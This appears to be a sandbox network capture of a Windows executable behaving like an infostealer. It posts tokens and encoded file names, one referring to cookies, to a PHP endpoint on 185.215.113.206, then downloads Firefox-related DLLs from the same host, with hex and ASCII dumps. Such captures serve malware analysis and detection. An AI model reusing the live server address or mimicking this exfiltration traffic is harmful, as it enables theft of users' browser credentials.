                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file"------KKJDGDHIDBGIECBGHJDB--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.039952040 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:25 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        2192.168.2.549773185.215.113.206805480C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:32.428005934 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGH
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 3087
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:32.428071022 CET3087OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 41 41 4b 46 42 41 45 47 44 47 43 42 47 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36
                                                                                                                                                                                                                                                        Data Ascii: ------IEGCAAKFBAEGDGCBGCGHContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------IEGCAAKFBAEGDGCBGCGHContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:34.423834085 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:33 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:34.662494898 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJK
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="file"------BGCBGCAFIIECBFIDHIJK--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:35.668661118 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:34 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.266324997 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.725963116 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:36 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                        ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 685392
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.725975990 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                        Data Ascii: UhOt8]h1]UWVEtu}U
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.726134062 CET1236INData Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f
                                                                                                                                                                                                                                                        Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.726183891 CET1236INData Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1
                                                                                                                                                                                                                                                        Data Ascii: T$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.726195097 CET1236INData Raw: 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d e5 c1 e0 10 c1 e1 08 09 c1 0f b6 45
                                                                                                                                                                                                                                                        Data Ascii: uSPVEPo9]SUYY)ZYEME]M)19DEEE|0)U|2!!)]|3)|3!)}|7
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.726255894 CET1236INData Raw: ca 74 3c 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 0f b6 0c 07 30 4c 06 0c 0f b6 0c 07 30 8c 06 8c 00 00 00 0f b6 4c 07 01 30 4c 06 0d 0f b6 4c 07 01 30 8c 06 8d 00 00 00 83 c0 02 39 c2 75 d1 8b 4d f0 31 e9 e8 37 fb 07 00 89 d8 83 c4 4c 5e 5f 5b 5d
                                                                                                                                                                                                                                                        Data Ascii: t<f.0L0L0LL09uM17L^_[]USWVh1tlEGGHt1Uuut,tGHjSGW:G^_[]U
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.726267099 CET1236INData Raw: 00 b8 02 00 00 00 66 0f 1f 44 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 1c 06
                                                                                                                                                                                                                                                        Data Ascii: fDT>\>=t%>>f1hM1)^_[]USWV01Eh1E=s hkhVo
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.726277113 CET1236INData Raw: 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 61 01 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 62 01 83 f9 02 75 2d 88 5d e8 89 45 ec eb 6e 85 d2 0f 84 7e 02 00 00 8b 75 10 0f b6 0e 83 fa 03 0f 85 81 02 00 00 89 4d e0 8b 4d ec 8a 55 e8 e9 96
                                                                                                                                                                                                                                                        Data Ascii: <U$2MaM2$1MUbu-]En~uMMUEEM]}7}E0MQM2MEP]EU+UUU9)]}1EEMA
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.734541893 CET744INData Raw: 07 8b 45 f0 88 14 18 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 08 03 45 e0 8b 55 e8 01 f2 83 c2 03 0f b6 d2 8b 75 f0 0f b6 1c 16 00 d9 0f b6 f1 8b 7d f0 8a 3c 37 8b 7d f0 88 3c 17 8b 55 f0 88 1c 32 00 df 0f b6 d7 8b 75 f0 0f b6 34 16 c1 e6 10 09
                                                                                                                                                                                                                                                        Data Ascii: EUEUu}<7}<U2u4EUU}4}4E]Uu3EUEu}U}]E]E8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:36.737124920 CET1236INData Raw: ff 8b 45 ec 04 07 89 45 ec 0f b6 c0 8b 7d f0 8a 0c 07 00 ce 0f b6 f6 8a 2c 37 88 2c 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89 e5 53 57 56 81 ec 5c 01 00 00 89 8d dc fe ff ff 8b 32 89 95
                                                                                                                                                                                                                                                        Data Ascii: EE},7,7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31tQI
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.350665092 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.815552950 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:38 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                        ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 608080
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:39.730551958 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.191013098 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:39 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                        ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 450024
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.906724930 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.366614103 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:41 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                        ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:44.792022943 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:45.253381968 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:45 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                        ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 257872
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:45.914129019 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.375386000 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:46 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                        ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 80880
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.135620117 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHC
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 1067
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.315761089 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:47 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                        Connection: Keep-Alive
